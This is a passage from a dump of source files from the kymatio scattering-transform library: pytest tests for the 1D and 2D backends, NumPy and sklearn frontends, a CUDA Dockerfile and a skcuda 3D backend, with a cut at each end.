scattering(x)\n for detail in [True, False]:\n # get the size of scattering\n size = scattering.output_size(detail=detail)\n if detail:\n num_orders = {0: 0, 1: 0, 2: 0}\n for k in s_dico.keys():\n if k is ():\n num_orders[0] += 1\n else:\n if len(k) == 1: # order1\n num_orders[1] += 1\n elif len(k) == 2:\n num_orders[2] += 1\n todo = 2 if max_order == 2 else 1\n for i in range(todo):\n assert num_orders[i] == size[i]\n # check that the orders are completely equal\n else:\n assert len(s_dico) == size\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_differentiability_scattering(device, backend, random_state=42):\n \"\"\"\n It simply tests whether it is really differentiable or not.\n This does NOT test whether the gradients are correct.\n \"\"\"\n\n if backend.name.endswith(\"_skcuda\"):\n pytest.skip(\"The skcuda backend does not pass differentiability\"\n \"tests, but that's ok (for now).\")\n\n torch.manual_seed(random_state)\n\n J = 6\n Q = 8\n T = 2**12\n\n scattering = Scattering1D(J, T, Q, frontend='torch', backend=backend).to(device)\n\n x = torch.randn(2, T, requires_grad=True, device=device)\n\n s = scattering.forward(x)\n loss = torch.sum(torch.abs(s))\n loss.backward()\n assert torch.max(torch.abs(x.grad)) > 0.\n\n\[email protected](\"backend\", backends)\ndef test_scattering_shape_input(backend):\n # Checks that a wrong input to shape raises an error\n J, Q = 6, 8\n with pytest.raises(ValueError) as ve:\n shape = 5, 6\n s = Scattering1D(J, shape, Q, backend=backend, frontend='torch')\n assert \"exactly one element\" in ve.value.args[0]\n\n\n with pytest.raises(ValueError) as ve:\n shape = 1.5\n s = Scattering1D(J, shape, Q, backend=backend, frontend='torch')\n # should invoke the else branch\n assert \"1-tuple\" in ve.value.args[0]\n assert \"integer\" in ve.value.args[0]\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_batch_shape_agnostic(device, backend):\n J, Q = 3, 8\n length = 1024\n shape = (length,)\n\n length_ds = length / 2**J\n\n S = Scattering1D(J, shape, Q, backend=backend, frontend='torch').to(device)\n\n with pytest.raises(ValueError) as ve:\n S(torch.zeros(()).to(device))\n assert \"at least one axis\" in ve.value.args[0]\n\n x = torch.zeros(shape).to(device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n Sx = S(x)\n assert \"CPU\" in ve.value.args[0]\n return\n\n Sx = S(x)\n\n assert Sx.dim() == 2\n assert Sx.shape[-1] == length_ds\n\n n_coeffs = Sx.shape[-2]\n\n test_shapes = ((1,) + shape, (2,) + shape, (2,2) + shape, (2,2,2) + shape)\n\n for test_shape in test_shapes:\n x = torch.zeros(test_shape).to(device)\n\n S.vectorize = True\n Sx = S(x)\n\n assert Sx.dim() == len(test_shape)+1\n assert Sx.shape[-1] == length_ds\n assert Sx.shape[-2] == n_coeffs\n assert Sx.shape[:-2] == test_shape[:-1]\n\n S.vectorize = False\n Sx = S(x)\n\n assert len(Sx) == n_coeffs\n for k, v in Sx.items():\n assert v.shape[-1] == length_ds\n assert v.shape[-2] == 1\n assert v.shape[:-2] == test_shape[:-1]\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_pad_1d(device, backend, random_state=42):\n \"\"\"\n Tests the correctness and differentiability of pad_1d\n \"\"\"\n torch.manual_seed(random_state)\n N = 128\n for pad_left in range(0, N - 16, 16):\n for pad_right in [pad_left, pad_left + 16]:\n x = torch.randn(2, 4, N, requires_grad=True, device=device)\n x_pad = backend.pad_1d(x, pad_left, pad_right, mode='reflect')\n # Check the size\n x2 = x.clone()\n x_pad2 = x_pad.clone()\n for t in range(1, pad_left + 1):\n assert torch.allclose(x_pad2[..., pad_left - t],x2[..., t])\n for t in range(x2.shape[-1]):\n assert torch.allclose(x_pad2[..., pad_left + t], x2[..., t])\n for t in range(1, pad_right + 1):\n assert torch.allclose(x_pad2[..., x_pad.shape[-1] - 1 - pad_right + t], x2[..., x.shape[-1] - 1 - t])\n # check the differentiability\n loss = 0.5 * torch.sum(x_pad**2)\n loss.backward()\n # compute the theoretical gradient for x\n x_grad_original = x.clone()\n x_grad = x_grad_original.new(x_grad_original.shape).fill_(0.)\n x_grad += x_grad_original\n for t in range(1, pad_left + 1):\n x_grad[..., t] += x_grad_original[..., t]\n for t in range(1, pad_right + 1): # it is counted twice!\n t0 = x.shape[-1] - 1 - t\n x_grad[..., t0] += x_grad_original[..., t0]\n # get the difference\n assert torch.allclose(x.grad, x_grad)\n # Check that the padding shows an error if we try to pad\n with pytest.raises(ValueError):\n backend.pad_1d(x, x.shape[-1], 0, mode='reflect')\n with pytest.raises(ValueError):\n backend.pad_1d(x, 0, x.shape[-1], mode='reflect')\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_modulus(device, backend, random_state=42):\n \"\"\"\n Tests the stability and differentiability of modulus\n \"\"\"\n torch.manual_seed(random_state)\n # Test with a random vector\n x = torch.randn(2, 4, 128, 2, requires_grad=True, device=device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n # If we are using a GPU-only backend, make sure it raises the proper\n # errors for CPU tensors.\n with pytest.raises(TypeError) as re:\n x_bad = torch.randn((4, 2)).cpu()\n backend.modulus_complex(x_bad)\n assert \"for CPU tensors\" in re.value.args[0]\n return\n\n\n x_abs = backend.modulus_complex(x)\n\n assert len(x_abs.shape) == len(x.shape)\n # check the value\n x_abs2 = x_abs.clone()\n x2 = x.clone()\n assert torch.allclose(x_abs2[..., 0], torch.sqrt(x2[..., 0]**2 + x2[..., 1]**2))\n\n with pytest.raises(TypeError) as te:\n x_bad = torch.randn(4).to(device)\n backend.modulus_complex(x_bad)\n assert \"should be complex\" in te.value.args[0]\n\n if backend.name.endswith(\"_skcuda\"):\n pytest.skip(\"The skcuda backend does not pass differentiability\"\n \"tests, but that's ok (for now).\")\n\n # check the gradient\n loss = torch.sum(x_abs)\n loss.backward()\n x_grad = x2 / x_abs2[..., 0].unsqueeze(dim=-1)\n assert torch.allclose(x.grad, x_grad)\n\n\n # Test the differentiation with a vector made of zeros\n x0 = torch.zeros(100, 4, 128, 2, requires_grad=True, device=device)\n x_abs0 = backend.modulus_complex(x0)\n loss0 = torch.sum(x_abs0)\n loss0.backward()\n assert torch.max(torch.abs(x0.grad)) <= 1e-7\n\n\[email protected](\"backend\", backends)\[email protected](\"device\", devices)\ndef test_subsample_fourier(backend, device, random_state=42):\n \"\"\"\n Tests whether the periodization in Fourier performs a good subsampling\n in time\n \"\"\"\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as re:\n x_bad = torch.randn((4, 2)).cpu()\n backend.subsample_fourier(x_bad, 1)\n assert \"for CPU tensors\" in re.value.args[0]\n return\n rng = np.random.RandomState(random_state)\n J = 10\n x = rng.randn(2, 4, 2**J) + 1j * rng.randn(2, 4, 2**J)\n x_f = np.fft.fft(x, axis=-1)[..., np.newaxis]\n x_f.dtype = 'float64' # make it a vector\n x_f_th = torch.from_numpy(x_f).to(device)\n\n for j in range(J + 1):\n x_f_sub_th = backend.subsample_fourier(x_f_th, 2**j).cpu()\n x_f_sub = x_f_sub_th.numpy()\n x_f_sub.dtype = 'complex128'\n x_sub = np.fft.ifft(x_f_sub[..., 0], axis=-1)\n assert np.allclose(x[:, :, ::2**j], x_sub)\n\n # If we are using a GPU-only backend, make sure it raises the proper\n # errors for CPU tensors.\n if device=='cuda':\n with pytest.raises(TypeError) as te:\n x_bad = torch.randn(4).cuda()\n backend.subsample_fourier(x_bad, 1)\n assert \"should be complex\" in te.value.args[0]\n"
},
{
"alpha_fraction": 0.5615991353988647,
"alphanum_fraction": 0.5694860219955444,
"avg_line_length": 39.85555648803711,
"blob_id": "35305bb19e7bc4f6b78df6abe84b05f19b284289",
"content_id": "1b0878c539732deca51d12ecb55f45787d9d46e6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3677,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 90,
"path": "/kymatio/scattering1d/frontend/numpy_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Mathieu Andreux, Joakim Anden, Edouard Oyallon\n# Scientific Ancestry: Joakim Anden, Mathieu Andreux, Vincent Lostanlen\n\nimport warnings\n\nfrom ...frontend.numpy_frontend import ScatteringNumPy\nfrom ..core.scattering1d import scattering1d\nfrom ..utils import precompute_size_scattering\nfrom .base_frontend import ScatteringBase1D\n\n\nclass ScatteringNumPy1D(ScatteringNumPy, ScatteringBase1D):\n def __init__(self, J, shape, Q=1, max_order=2, average=True,\n oversampling=0, vectorize=True, out_type='array', backend='numpy'):\n ScatteringNumPy.__init__(self)\n ScatteringBase1D.__init__(self, J, shape, Q, max_order, average,\n oversampling, vectorize, out_type, backend)\n ScatteringBase1D._instantiate_backend(self, 'kymatio.scattering1d.backend.')\n ScatteringBase1D.build(self)\n ScatteringBase1D.create_filters(self)\n\n def scattering(self, x):\n # basic checking, should be improved\n if len(x.shape) < 1:\n raise ValueError(\n 'Input tensor x should have at least one axis, got {}'.format(\n len(x.shape)))\n\n if not self.out_type in ('array', 'list'):\n raise RuntimeError(\"The out_type must be one of 'array' or 'list'.\")\n\n if not self.average and self.out_type == 'array' and self.vectorize:\n raise ValueError(\"Options average=False, out_type='array' and \"\n \"vectorize=True are mutually incompatible. \"\n \"Please set out_type to 'list' or vectorize to \"\n \"False.\")\n if not self.vectorize:\n warnings.warn(\"The vectorize option is deprecated and will be \"\n \"removed in version 0.3. Please set \"\n \"out_type='list' for equivalent functionality.\",\n DeprecationWarning)\n\n batch_shape = x.shape[:-1]\n signal_shape = x.shape[-1:]\n\n x = x.reshape((-1, 1) + signal_shape)\n\n # get the arguments before calling the scattering\n # treat the arguments\n if self.vectorize:\n size_scattering = precompute_size_scattering(\n self.J, self.Q, max_order=self.max_order, detail=True)\n else:\n size_scattering = 0\n\n S = scattering1d(x, self.backend.pad, self.backend.unpad, self.backend, self.J, self.psi1_f, self.psi2_f,\n self.phi_f, max_order=self.max_order, average=self.average, pad_left=self.pad_left,\n pad_right=self.pad_right, ind_start=self.ind_start, ind_end=self.ind_end,\n oversampling=self.oversampling,\n vectorize=self.vectorize,\n size_scattering=size_scattering,\n out_type=self.out_type)\n\n if self.out_type == 'array' and self.vectorize:\n scattering_shape = S.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S = S.reshape(new_shape)\n elif self.out_type == 'array' and not self.vectorize:\n for k, v in S.items():\n # NOTE: Have to get the shape for each one since we may have\n # average == False.\n scattering_shape = v.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S[k] = v.reshape(new_shape)\n elif self.out_type == 'list':\n for x in S:\n scattering_shape = x['coef'].shape[-1:]\n new_shape = batch_shape + scattering_shape\n\n x['coef'] = x['coef'].reshape(new_shape)\n\n return S\n\n\nScatteringNumPy1D._document()\n\n\n__all__ = ['ScatteringNumPy1D']\n"
},
{
"alpha_fraction": 0.5316846966743469,
"alphanum_fraction": 0.5672333836555481,
"avg_line_length": 22.10714340209961,
"blob_id": "a051ee4678e4268bc842dbb4e9f0b69d2248e888",
"content_id": "e724cb1ffd147044dea695ec2c68061f59b7b2cf",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 647,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 28,
"path": "/tools/Dockerfile",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "FROM nvidia/cuda:11.2.2-devel-ubuntu20.04\n\nRUN apt-get update && \\\n DEBIAN_FRONTEND=noninteractive apt-get install -y \\\n libcudnn8 \\\n python3-appdirs \\\n python3-mako \\\n python3-numpy \\\n python3-pytest \\\n python3-pytest-cov \\\n python3-pytools \\\n python3-pip \\\n python3-venv \\\n python3-yaml \\\n curl \\\n && \\\n apt-get autoremove --purge -y && \\\n apt-get autoclean -y && \\\n rm -rf /var/cache/apt/* /var/lib/apt/lists/*\n\nRUN pip3 install \\\n scipy \\\n configparser \\\n torchvision \\\n scikit-cuda \\\n cupy \\\n 'tensorflow-gpu>=2.0.0a0' \\\n scikit-learn\n"
},
{
"alpha_fraction": 0.7341772317886353,
"alphanum_fraction": 0.7594936490058899,
"avg_line_length": 25.33333396911621,
"blob_id": "2e80a22e3ac8fcf5a7967a015bdff87cff7ee411",
"content_id": "166d79b4e3d270371e190fa650880cb54d38549b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 79,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 3,
"path": "/kymatio/scattering1d/__init__.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .frontend.entry import ScatteringEntry1D\n\n__all__ = ['ScatteringEntry1D']\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6373626589775085,
"avg_line_length": 30.77777862548828,
"blob_id": "8311b49168be31377326465a12615868882b55cf",
"content_id": "20900955f24bcc31d802e9bbcba47bdee995de70",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2002,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 63,
"path": "/tests/scattering1d/test_utils_scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pytest\nfrom kymatio import Scattering1D\nfrom kymatio.scattering1d.frontend.torch_frontend import ScatteringTorch1D\nfrom kymatio.scattering1d.utils import compute_border_indices, compute_padding\n\n\ndef test_compute_padding():\n \"\"\"\n Test the compute_padding function\n \"\"\"\n\n pad_left, pad_right = compute_padding(5, 16)\n assert pad_left == 8 and pad_right == 8\n\n with pytest.raises(ValueError) as ve:\n _, _ = compute_padding(3, 16)\n assert \"should be larger\" in ve.value.args[0]\n\n with pytest.raises(ValueError) as ve:\n _, _ = compute_padding(6, 16)\n assert \"Too large padding value\" in ve.value.args[0]\n\n\ndef test_border_indices(random_state=42):\n \"\"\"\n Tests whether the border indices to unpad are well computed\n \"\"\"\n rng = np.random.RandomState(random_state)\n J_signal = 10 # signal lives in 2**J_signal\n J = 6 # maximal subsampling\n\n T = 2**J_signal\n\n i0 = rng.randint(0, T // 2 + 1, 1)[0]\n i1 = rng.randint(i0 + 1, T, 1)[0]\n\n x = np.ones(T)\n x[i0:i1] = 0.\n\n ind_start, ind_end = compute_border_indices(J, i0, i1)\n\n for j in range(J + 1):\n assert j in ind_start.keys()\n assert j in ind_end.keys()\n x_sub = x[::2**j]\n # check that we did take the strict interior\n assert np.max(x_sub[ind_start[j]:ind_end[j]]) == 0.\n # check that we have not forgotten points\n if ind_start[j] > 0:\n assert np.min(x_sub[:ind_start[j]]) > 0.\n if ind_end[j] < x_sub.shape[-1]:\n assert np.min(x_sub[ind_end[j]:]) > 0.\n\n\n# Check that the default frontend is numpy and that errors are correctly launched.\ndef test_scattering1d_frontend():\n scattering = Scattering1D(2, shape=(10, ))\n assert isinstance(scattering, ScatteringTorch1D), 'could not be correctly imported'\n\n with pytest.raises(RuntimeError) as ve:\n scattering = Scattering1D(2, shape=(10,), frontend='doesnotexist')\n assert \"is not valid\" in ve.value.args[0]\n"
},
{
"alpha_fraction": 0.7971698045730591,
"alphanum_fraction": 0.8113207817077637,
"avg_line_length": 29.285715103149414,
"blob_id": "612fde7ac1cddedd509d6753443c0f525b05d1d7",
"content_id": "8681992fecb5e466fabc7b467e80646ca358fc06",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 424,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 14,
"path": "/kymatio/scattering1d/frontend/sklearn_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.sklearn_frontend import ScatteringTransformerMixin\nfrom ...numpy import Scattering1D as ScatteringNumPy1D\n\n\n# NOTE: Order in base classes matters here, since we want the sklearn-specific\n# documentation parameters to take precedence over NP.\nclass ScatteringTransformer1D(ScatteringTransformerMixin, ScatteringNumPy1D):\n pass\n\n\nScatteringTransformer1D._document()\n\n\n__all__ = ['ScatteringTransformer1D']\n"
},
{
"alpha_fraction": 0.500292181968689,
"alphanum_fraction": 0.5408437252044678,
"avg_line_length": 30.116363525390625,
"blob_id": "9568f8961d98e446ca170e014f44a5a6f524c84d",
"content_id": "46798204a9d2e623b68704648330f33686694dad",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8557,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 275,
"path": "/tests/scattering2d/test_numpy_scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import os\nimport io\nimport numpy as np\nfrom kymatio import Scattering2D\nfrom collections import namedtuple\nimport pytest\n\n\nbackends = []\n\nfrom kymatio.scattering2d.backend.numpy_backend import backend\nbackends.append(backend)\n\n\nclass TestPad:\n @pytest.mark.parametrize('backend', backends)\n def test_Pad(self, backend):\n pad = backend.Pad((2, 2, 2, 2), (4, 4))\n\n x = np.random.randn(4, 4) + 1J * np.random.randn(4, 4)\n x = x[np.newaxis, ...]\n\n z = pad(x)\n\n assert z.shape == (1, 8, 8)\n assert z[0, 2, 2] == x[0, 0, 0]\n assert z[0, 1, 0] == x[0, 1, 2]\n assert z[0, 1, 1] == x[0, 1, 1]\n assert z[0, 1, 2] == x[0, 1, 0]\n assert z[0, 1, 3] == x[0, 1, 1]\n\n @pytest.mark.parametrize('backend', backends)\n def test_unpad(self, backend):\n x = np.random.randn(4, 4) + 1J * np.random.randn(4, 4)\n\n y = backend.unpad(x)\n\n assert y.shape == (2, 2)\n assert y[0, 0] == x[1, 1]\n assert y[0, 1] == x[1, 2]\n\n\nclass TestModulus:\n @pytest.mark.parametrize('backend', backends)\n def test_Modulus(self, backend):\n modulus = backend.modulus\n\n x = np.random.rand(100, 10, 4) + 1J * np.random.rand(100, 10, 4)\n\n y = modulus(x)\n u = np.squeeze(np.sqrt(np.real(x) ** 2 + np.imag(x) ** 2))\n v = y\n assert np.allclose(u, v)\n\n\nclass TestSubsampleFourier:\n @pytest.mark.parametrize('backend', backends)\n def test_SubsampleFourier(self, backend):\n subsample_fourier = backend.subsample_fourier\n\n x = (np.random.rand(100, 128, 128)\n + 1J * np.random.rand(100, 128, 128))\n\n y = np.zeros((100, 8, 8), dtype=np.complex128)\n\n from itertools import product\n for i, j in product(range(8), range(8)):\n for m, n in product(range(16), range(16)):\n y[..., i, j] += x[..., i + m * 8, j + n * 8]\n\n y /= 16 ** 2\n\n z = subsample_fourier(x, k=16)\n assert np.allclose(y, z)\n\n\nclass TestCDGMM:\n @pytest.fixture(params=(False, True))\n def data(self, request):\n real_filter = request.param\n x = (np.random.randn(100, 128, 128)\n + 1J * np.random.randn(100, 128, 128))\n filt = (np.random.randn(128, 128)\n + 1J * np.random.randn(128, 128))\n y = (np.random.randn(100, 128, 128)\n + 1J * np.random.randn(100, 128, 128))\n\n if real_filter:\n filt = np.real(filt)\n\n y = x * filt\n\n return x, filt, y\n\n @pytest.mark.parametrize('backend', backends)\n @pytest.mark.parametrize('inplace', (False, True))\n def test_cdgmm_forward(self, data, backend, inplace):\n x, filt, y = data\n\n z = backend.cdgmm(x, filt, inplace=inplace)\n\n assert np.allclose(y, z)\n\n @pytest.mark.parametrize('backend', backends)\n def test_cdgmm_exceptions(self, backend):\n with pytest.raises(TypeError) as record:\n backend.cdgmm(np.empty((3, 4, 5)).astype(np.float64),\n np.empty((4, 5)).astype(np.complex128))\n assert 'first input must be complex' in record.value.args[0]\n\n with pytest.raises(TypeError) as record:\n backend.cdgmm(np.empty((3, 4, 5)).astype(np.complex128),\n np.empty((4, 5)).astype(np.int64))\n assert 'second input must be complex or real' in record.value.args[0]\n\n with pytest.raises(RuntimeError) as record:\n backend.cdgmm(np.empty((3, 4, 5)).astype(np.complex128),\n np.empty((4, 6)).astype(np.complex128))\n assert 'not compatible for multiplication' in record.value.args[0]\n\n\nclass TestFFT:\n @pytest.mark.parametrize('backend', backends)\n def test_fft(self, backend):\n x = np.random.randn(2, 2) + 1J * np.random.randn(2, 2)\n\n y = np.array([[x[0, 0] + x[0, 1] + x[1, 0] + x[1, 1],\n x[0, 0] - x[0, 1] + x[1, 0] - x[1, 1]],\n [x[0, 0] + x[0, 1] - x[1, 0] - x[1, 1],\n x[0, 0] - x[0, 1] - x[1, 0] + x[1, 1]]])\n\n z = backend.fft(x, direction='C2C')\n\n assert np.allclose(y, z)\n\n z = backend.fft(x, direction='C2C', inverse=True)\n\n z = z * 4\n\n assert np.allclose(y, z)\n\n z = backend.fft(x, direction='C2R', inverse=True)\n\n z = z * 4\n\n assert not np.iscomplexobj(z)\n assert np.allclose(np.real(y), z)\n\n\n @pytest.mark.parametrize('backend', backends)\n def test_fft_exceptions(self, backend):\n with pytest.raises(RuntimeError) as record:\n backend.fft(np.empty((2, 2)), direction='C2R',\n inverse=False)\n assert 'done with an inverse' in record.value.args[0]\n\n\nclass TestBackendUtils:\n @pytest.mark.parametrize('backend', backends)\n def test_concatenate(self, backend):\n x = np.random.randn(3, 6, 6) + 1J * np.random.randn(3, 6, 6)\n y = np.random.randn(3, 6, 6) + 1J * np.random.randn(3, 6, 6)\n z = np.random.randn(3, 6, 6) + 1J * np.random.randn(3, 6, 6)\n\n w = backend.concatenate((x, y, z))\n\n assert w.shape == (x.shape[0],) + (3,) + (x.shape[-2:])\n assert np.allclose(w[:, 0, ...], x)\n assert np.allclose(w[:, 1, ...], y)\n assert np.allclose(w[:, 2, ...], z)\n\n\nclass TestScattering2DNumpy:\n @pytest.mark.parametrize('backend', backends)\n def test_Scattering2D(self, backend):\n test_data_dir = os.path.dirname(__file__)\n data = None\n with open(os.path.join(test_data_dir, 'test_data_2d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n x = data['x']\n S = data['Sx']\n J = data['J']\n pre_pad = data['pre_pad']\n\n M = x.shape[2]\n N = x.shape[3]\n\n scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad,\n frontend='numpy', backend=backend)\n\n x = x\n S = S\n Sg = scattering(x)\n assert np.allclose(Sg, S)\n\n scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad,\n max_order=1, frontend='numpy',\n backend=backend)\n\n S1x = scattering(x)\n assert np.allclose(S1x, S[..., :S1x.shape[-3], :, :])\n\n @pytest.mark.parametrize('backend', backends)\n def test_batch_shape_agnostic(self, backend):\n J = 3\n L = 8\n shape = (32, 32)\n\n shape_ds = tuple(n // (2 ** J) for n in shape)\n\n S = Scattering2D(J, shape, L, backend=backend, frontend='numpy')\n\n x = np.zeros(shape)\n\n Sx = S(x)\n\n assert len(Sx.shape) == 3\n assert Sx.shape[-2:] == shape_ds\n\n n_coeffs = Sx.shape[-3]\n\n test_shapes = ((1,) + shape, (2,) + shape, (2, 2) + shape,\n (2, 2, 2) + shape)\n\n for test_shape in test_shapes:\n x = np.zeros(test_shape)\n\n Sx = S(x)\n\n assert len(Sx.shape) == len(test_shape) + 1\n assert Sx.shape[-2:] == shape_ds\n assert Sx.shape[-3] == n_coeffs\n assert Sx.shape[:-3] == test_shape[:-2]\n\n @pytest.mark.parametrize('backend', backends)\n def test_scattering2d_errors(self, backend):\n S = Scattering2D(3, (32, 32), frontend='numpy', backend=backend)\n\n with pytest.raises(TypeError) as record:\n S(None)\n assert 'input should be' in record.value.args[0]\n\n x = np.random.randn(32)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'have at least two dimensions' in record.value.args[0]\n\n x = np.random.randn(31, 31)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'NumPy array must be of spatial size' in record.value.args[0]\n\n S = Scattering2D(3, (32, 32), pre_pad=True, frontend='numpy',\n backend=backend)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'Padded array must be of spatial size' in record.value.args[0]\n\n\n def test_inputs(self):\n fake_backend = namedtuple('backend', ['name',])\n fake_backend.name = 'fake'\n\n with pytest.raises(ImportError) as ve:\n scattering = Scattering2D(2, shape=(10, 10), frontend='numpy', backend=fake_backend)\n assert 'not supported' in ve.value.args[0]\n\n with pytest.raises(RuntimeError) as ve:\n scattering = Scattering2D(10, shape=(10, 10), frontend='numpy')\n assert 'smallest dimension' in ve.value.args[0]\n"
},
{
"alpha_fraction": 0.6403061151504517,
"alphanum_fraction": 0.6444515585899353,
"avg_line_length": 32.01052474975586,
"blob_id": "995d6e07ae7fc1e5788168c6273950e654ac3a64",
"content_id": "868e1cb25b78ed7e27c90f5be3b6c4c43125778f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3136,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 95,
"path": "/kymatio/scattering3d/backend/torch_skcuda_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport warnings\nfrom skcuda import cublas\n\nBACKEND_NAME = 'torch_skcuda'\n\nfrom collections import namedtuple\n\n\ndef _is_complex(input):\n return input.shape[-1] == 2\n\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : torch tensor\n Complex torch tensor.\n B : torch tensor\n Complex of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Raises\n ------\n RuntimeError\n In the event that the tensors are not compatibile for multiplication\n (i.e. the final four dimensions of A do not match with the dimensions\n of B), or in the event that B is not complex, or in the event that the\n type of A and B are not the same.\n TypeError\n In the event that x is not complex i.e. does not have a final dimension\n of 2, or in the event that both tensors are not on the same device.\n\n Returns\n -------\n output : torch tensor\n Torch tensor of the same size as A containing the result of the\n elementwise complex multiplication of A with B.\n\n \"\"\"\n if not A.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor A is converted to a contiguous array\")\n A = A.contiguous()\n if not B.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor B is converted to a contiguous array\")\n B = B.contiguous()\n\n if A.shape[-4:] != B.shape:\n raise RuntimeError('The filters are not compatible for multiplication.')\n\n if not _is_complex(A) or not _is_complex(B):\n raise TypeError('The input, filter and output should be complex.')\n\n if B.ndimension() != 4:\n raise RuntimeError('The filters must be simply a complex array.')\n\n if type(A) is not type(B):\n raise RuntimeError('A and B should be same type.')\n\n if not A.is_cuda:\n raise RuntimeError('Use the torch backend for CPU tensors.')\n\n C = A.new(A.shape) if not inplace else A\n m, n = B.nelement() // 2, A.nelement() // B.nelement()\n lda = m\n ldc = m\n incx = 1\n handle = torch.cuda.current_blas_handle()\n stream = torch.cuda.current_stream()._as_parameter_\n cublas.cublasSetStream(handle, stream)\n cublas.cublasCdgmm(handle, 'l', m, n, A.data_ptr(), lda, B.data_ptr(), incx, C.data_ptr(), ldc)\n return C\n\n\nfrom .torch_backend import complex_modulus\nfrom .torch_backend import fft\nfrom .torch_backend import modulus_rotation\nfrom .torch_backend import compute_integrals\nfrom .torch_backend import concatenate\n\nbackend = namedtuple('backend', ['name', 'cdgmm3d', 'fft', 'modulus', 'modulus_rotation',\n 'compute_integrals', 'concatenate'])\n\nbackend.name = 'torch_skcuda'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.concatenate = concatenate\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\n"
},
{
"alpha_fraction": 0.6475409865379333,
"alphanum_fraction": 0.6639344096183777,
"avg_line_length": 29.5,
"blob_id": "092075b55893afa14365e699e8f64d98fba87858",
"content_id": "019bf67db14fc55be434dabc646b22ef9592a079",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 8,
"path": "/kymatio/scattering1d/frontend/entry.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.entry import ScatteringEntry\n\nclass ScatteringEntry1D(ScatteringEntry):\n def __init__(self, *args, **kwargs):\n super().__init__(name='1D', class_name='scattering1d', *args, **kwargs)\n\n\n__all__ = ['ScatteringEntry1D']\n"
},
{
"alpha_fraction": 0.5673875212669373,
"alphanum_fraction": 0.5856308341026306,
"avg_line_length": 33.9713249206543,
"blob_id": "c3eaaccd00f6cf0f614b3ba59cf0097644d77901",
"content_id": "adc8fca9a9ceb9837ae5ea95e1bee98954212fe9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9757,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 279,
"path": "/kymatio/scattering1d/utils.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport math\nfrom .filter_bank import scattering_filter_factory, calibrate_scattering_filters\n\ndef compute_border_indices(J, i0, i1):\n \"\"\"\n Computes border indices at all scales which correspond to the original\n signal boundaries after padding.\n\n At the finest resolution,\n original_signal = padded_signal[..., i0:i1].\n This function finds the integers i0, i1 for all temporal subsamplings\n by 2**J, being conservative on the indices.\n\n Parameters\n ----------\n J : int\n maximal subsampling by 2**J\n i0 : int\n start index of the original signal at the finest resolution\n i1 : int\n end index (excluded) of the original signal at the finest resolution\n\n Returns\n -------\n ind_start, ind_end: dictionaries with keys in [0, ..., J] such that the\n original signal is in padded_signal[ind_start[j]:ind_end[j]]\n after subsampling by 2**j\n \"\"\"\n ind_start = {0: i0}\n ind_end = {0: i1}\n for j in range(1, J + 